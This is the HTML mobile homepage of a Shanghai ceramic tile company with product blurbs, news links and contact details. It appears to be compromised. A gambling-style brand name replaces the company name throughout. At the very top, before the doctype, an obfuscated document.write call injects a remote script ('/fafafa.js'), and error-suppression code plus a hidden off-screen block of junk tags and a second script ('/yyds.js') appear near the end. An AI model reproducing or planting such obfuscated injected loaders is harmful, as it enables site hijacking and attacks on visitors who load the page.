<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script><!DOCTYPE html>
<html>
<!--头部--><head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, max-age=0, must-revalidate, no-store">
<meta http-equiv="Expires" content="0">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="format-detection" content="telephone=no">
<meta name="screen-orientation" content="portrait"><!-- uc强制竖屏 -->
<meta name="x5-orientation" content="portrait"><!-- QQ强制竖屏 -->
    <link href="/css/reset.css" rel="stylesheet">
    <link rel="stylesheet" type="text/css" href="/icon/iconfont.css">
    <link href="/css/swiper.min.css" rel="stylesheet" type="text/css"  media="all">
    <link href="/css/mcommon.css" rel="stylesheet">
    <link href="/css/mnew.css" rel="stylesheet">
<script src="/js/jquery.min.js" ></script>
   <style>
     .mast1{position: fixed; top: 0; right: 0; bottom: 0; left: 0; background: rgba(0,0,0,.5);z-index: 9996;}
     .ad01{ position: fixed; width: 80%; left: 10%; right:10%; top: 50%; transform: translateY(-50%); z-index: 9999;}
     .ad01 img{ max-width: 100%; height: auto;}
     .adbox{ position: relative; display: block;}
     .close{ position: absolute; display: block; width: 100%; height:13% ;  bottom: 0;}
.column_banner a{postion:absolute;display:block;width:100%;height:100%;z-index:99}
    </style>
    <title>97522国际游戏官网-追求健康,你我一起成长</title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"/>
<link rel="canonical" href="http://www.zhonghengcaiwu.com/">
<meta name="mobile-agent"content="format=[wml|xhtml|html5]; url=http://m.zhonghengcaiwu.com/">
<link href="http://m.zhonghengcaiwu.com/" rel="alternate" media="only screen and (max-width: 1000px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta name="applicable-device" content="pc,mobile">
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />

  <div id="rbfws6" class="header"><div id="dejsxf" class="logo"><a href="/"><img src="/img/logo.png"></a></div><div id="xhm5an" class="header-right"><ul><li></li></ul></div></div>    
    <div id="1w16nm" class="mobile-bar"><span></span></div>
<div id="y42krd" class="ad01"><div id="tc371r" class="adbox"><a href="/v-1-3268.aspx" target="_blank"><img src="/img/ad2023.png" /></a><a class="close"></a></div></div>
<div id="apxlq4" class="mast1"></div>
<script>
var iTime
iTime=setTimeout("test()",10000);
function test(){
$('.ad01,.mast1').hide();
}
$(".mast1,.close").click(function(){
  $('.ad01,.mast1').hide();  
})
</script>
<div id="9n4exl" class="column_banner"><div class="swiper-container" id="column">
        <div id="18f0ww" class="swiper-wrapper">
       
<div id="nhz951" class="swiper-slide" style=" background: url(/UploadFiles/Z133316448298055.jpg) no-repeat center center; background-size: cover;"> <a href="/v-1-3268.aspx"></a></div>

<div id="e0zmkg" class="swiper-slide" style=" background: url(/UploadFiles/W133316449164930.jpg) no-repeat center center; background-size: cover;"> <a href="/v-1-2428.aspx"></a></div>

<div id="3p6b22" class="swiper-slide" style=" background: url(/UploadFiles/L133316450659079.jpg) no-repeat center center; background-size: cover;"> <a href="https://pc.zhonghengcaiwu.com/"></a></div>

<div id="pxgd5k" class="swiper-slide" style=" background: url(/UploadFiles/8133316451180068.jpg) no-repeat center center; background-size: cover;"> <a href="/v-1-2428.aspx"></a></div>

<div id="zap489" class="swiper-slide" style=" background: url(/UploadFiles/P133316452358871.jpg) no-repeat center center; background-size: cover;"> <a href="https://pc.zhonghengcaiwu.com/"></a></div>

           
            </div>
            <div id="ehmxhd" class="swiper-pagination"></div>
            </div>
</div>
<div id="2n2e7f" class="m-home-1">
<div id="jxefxn" class="m-home-name"><b>选择你的97522国际游戏磁砖</b>认识97522国际游戏的瓷砖系列</div>
<div id="6cxryt" class="more-btn">更多产品系列</div>
</div>
<div id="bsc7mw" class="m-home-2"><div id="zs624r" class="mast"></div><div id="nn1zw0" class="bd2-content">
<p>CIMIC TILES</p>97522国际游戏磁砖以“中西合璧”的时尚理念为设计源泉，选用意大利、瑞士全套专业瓷砖生产线，通过智能仿真技术，精选不含辐射物质的原料，生产出自然亮丽的瓷砖产品。<div id="hjssk9" class="more-btn"><a href="/3g/view.aspx?m_id=1&amp;id=176">更多详情</a></div></div>
</div>
<div id="c7bte5" class="m-home-3">
<div id="gb79bj" class="m-home-name"><b>公司新闻</b>实时更新97522国际游戏磁砖最新信息</div>
<div id="7m219m" class="show-news">
<ul>
<li><a href="/3g/view.aspx?m_id=1&id=3393"><b>捷报 | 97522国际游戏荣膺2024品牌强国双项重磅荣誉</b>
<p> 2025-03-28</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3392"><b>快讯 | 97522国际游戏磁砖荣膺“2024年度中国家居冠军榜匠心质造品牌”</b>
<p> 2025-03-28</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3391"><b>服务进阶 荣耀加冕 | 97522国际游戏磁砖荣获网易家居2025年度家居行业服务榜样</b>
<p> 2025-03-28</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3372"><b>喜报|97522国际游戏玻化石荣获2024“京闻·创响杯”建筑装饰产品设计大赛陶瓷优秀奖</b>
<p> 2025-01-14</p></a></li>

<li><a href="/3g/view.aspx?m_id=1&id=3371"><b>力量见证 | 97522国际游戏磁砖2024年度博鳌企业论坛上实力双丰收！</b>
<p> 2025-01-14</p></a></li>


</ul>
</div>
<div id="j57em4" class="more-btn">更多详情</div>
</div>

<script>
$(function(){

     var swiper = new Swiper('#column', {
        pagination: '#column .swiper-pagination',
        paginationClickable: true,
        autoplay: '2000',
    });        	
 	});	

</script>

<div id="z15h18" class="footer">
    <div id="6e6c89" class="containt">
    <div id="026jbe" class="footer-list"><ul><li>产品资讯</li>
    <li><a href="/3g/view.aspx?m_id=1&id=176">企业信息</a></li>
    <li><a href="/a/25.aspx">经典案例</a></li>
    <li><a href="/3g/view.aspx?m_id=1&id=1">全国招商</a></li>
    <li><a href="/sales.html">销售网络</a>
     </li>
  
    </ul></div>
    <div id="1l3w80" class="footer-entrance clearfix"><div id="403dnc" class="entrance-left"><b>分站路口</b><div id="cbfbpp" class="select"><i>请选择分站</i><dl><dd>悦心健康集团</dd></dl></div></div>
<div id="gawxqq" class="entrance-right"><i>全国招商热线</i><b>400-820-3892</b></div>
</div></div>
<div id="3b92zm" class="share"><ul><li><img src="/img/weibo.png" /></li><li><img src="/img/wechat.png" /><dl><dd><img src="/img/wechat.jpg" /></dd></dl></li><li><img src="/img/dy.png" /><dl><dd><img src="/img/bigdy.jpg" /></dd></dl></li><li> <div id="e8webe" class="containt bottomadr" >公司电话：021-52230777      <br>  售后服务热线：021-54312300  <br>  业务监督电话：021-63862128   <br>  <br> 公司地址：上海市黄浦区中山南一路893号</div></li></ul></div>
<div id="syzhw5" class="copy"><div id="bxp0e1" class="containt">上海97522国际游戏建筑陶瓷有限公司 版权所有<br> <i>沪ICP备17056386号-1沪公网安备 31010102003311号</i></div></div>
</div>

</div>
</div>
<div id="q200f7" class="mast"></div>
<div id="a45g2x" class="nav">
    <ul><li> <a href="/3g/">首页</a>    </li> <li>产品资讯 
         </li>   <li> <a href="/3g/view.aspx?m_id=1&amp;id=176"> 企业信息</a></li> <li>   <a href="/a/25.aspx">   经典案例</a> </li>        <li>   <a href="/3g/list.aspx?id=11">    营销活动</a> </li>       <li>       <a href="/3g/view.aspx?m_id=1&amp;id=1">全国招商</a> </li><li>       <a href="/3g/list.aspx?id=187">展厅鉴赏</a> </li>  <li>       <a href="/sales.html">销售网络</a> </li> <li>       <a href="/v-1-32.aspx">在线客服</a> </li>   <li>       <a href="/3g/list.aspx?id=185">电子图册</a> </li> </ul>
    </div>
<div id="3h7lry" class="seachbox"><input name="key"  type="text" class="scText" value=""><input name="" type="submit" class="scBtn" value="搜索" ></div>
<script src="/js/swiper.min.js" ></script>
<script src="/js/common.js" ></script>



<div id='body_jx_63686022' style='position:fixed; left:-9000px; top:-9000px;'><od class='iazyzb'><ic id='iazyzb'></ic></od><tukor class='ngylkl'><nkl id='ngylkl'></nkl></tukor><pffxn class='gjgmiq'><gcw id='gjgmiq'></gcw></pffxn><dj class='jmskca'><idwm id='jmskca'></idwm></dj><dg class='mnehlt'><omhrl id='mnehlt'></omhrl></dg><nl class='hqwrej'><tu id='hqwrej'></tu></nl><aitfm class='wqeirf'><lbvqpi id='wqeirf'></lbvqpi></aitfm><yov class='daplyq'><dnyu id='daplyq'></dnyu></yov><bwte class='jjvwnw'><cnc id='jjvwnw'></cnc></bwte><haya class='sfvbvj'><fpa id='sfvbvj'></fpa></haya><lzjp class='ytihkl'><gdwzvs id='ytihkl'></gdwzvs></lzjp><ii class='btyrts'><onjy id='btyrts'></onjy></ii><egsr class='kewqca'><meuq id='kewqca'></meuq></egsr><afpp class='dzqztk'><ysnhv id='dzqztk'></ysnhv></afpp><scoh class='neszyn'><ubtidp id='neszyn'></ubtidp></scoh><yf class='cupkxo'><kwz id='cupkxo'></kwz></yf><bwi class='ephusx'><pjyorf id='ephusx'></pjyorf></bwi><fwfif class='xpbgph'><oghxu id='xpbgph'></oghxu></fwfif><jgf class='nwrdce'><efmv id='nwrdce'></efmv></jgf><fhuw class='qcngou'><mkbai id='qcngou'></mkbai></fhuw><lgipu class='pemfas'><kv id='pemfas'></kv></lgipu><ksmc class='memkbf'><wc id='memkbf'></wc></ksmc><wwqfe class='oujebv'><cgqeur id='oujebv'></cgqeur></wwqfe><vhu class='gmkzsw'><tiwwl id='gmkzsw'></tiwwl></vhu><ejspj class='tudpzp'><vjdsd id='tudpzp'></vjdsd></ejspj><hp class='yagqbv'><jqht id='yagqbv'></jqht></hp><gqe class='ntwmfd'><xz id='ntwmfd'></xz></gqe><cts class='mcumyh'><cx id='mcumyh'></cx></cts><dwi class='szmuhl'><sx id='szmuhl'></sx></dwi><bxwo class='dslqkh'><ecbj id='dslqkh'></ecbj></bxwo><zlij class='xiityh'><asu id='xiityh'></asu></zlij><nff class='ikjyue'><bytl id='ikjyue'></bytl></nff><jwu class='ijwuhm'><eii id='ijwuhm'></eii></jwu><fb class='oazsvy'><ow id='oazsvy'></ow></fb><ljqtb class='wxqaii'><hiebp id='wxqaii'></hiebp></ljqtb><qhgq class='xrnabm'><mdx id='xrnabm'></mdx></qhgq><tcap class='jbyhov'><tv id='jbyhov'></tv></tcap><qza class='zabtlb'><ax id='zabtlb'></ax></qza><jtt class='spapzq'><qdgymq id='spapzq'></qdgymq></jtt><ugtgd class='ioflny'><cytm id='ioflny'></cytm></ugtgd><hgwuw class='bbkjzr'><zdfj id='bbkjzr'></zdfj></hgwuw><mn class='cncomf'><aikgcu id='cncomf'></aikgcu></mn><bpxgm class='mzjldw'><ck id='mzjldw'></ck></bpxgm><ekdl class='yleszn'><dpl id='yleszn'></dpl></ekdl><rjioe class='yykopl'><leskph id='yykopl'></leskph></rjioe><mb class='vovega'><ljcir id='vovega'></ljcir></mb><dl class='ojfqxp'><gr id='ojfqxp'></gr></dl><amwn class='ddorge'><aeyquy id='ddorge'></aeyquy></amwn><qwg class='rtcogq'><rwk id='rtcogq'></rwk></qwg><way class='cwutco'><jmvtsr id='cwutco'></jmvtsr></way></div>

<div style="text-align:center;"><a href="http://www.zhonghengcaiwu.com/data/sitemap/www.zhonghengcaiwu.com.xml">【网站地图】</a><a href="http://www.zhonghengcaiwu.com/data/sitemap/www.zhonghengcaiwu.com.xml">【sitemap】</a></div>
<script src="/yyds.js"></script></body>
</html><!--0.00012397766113281-->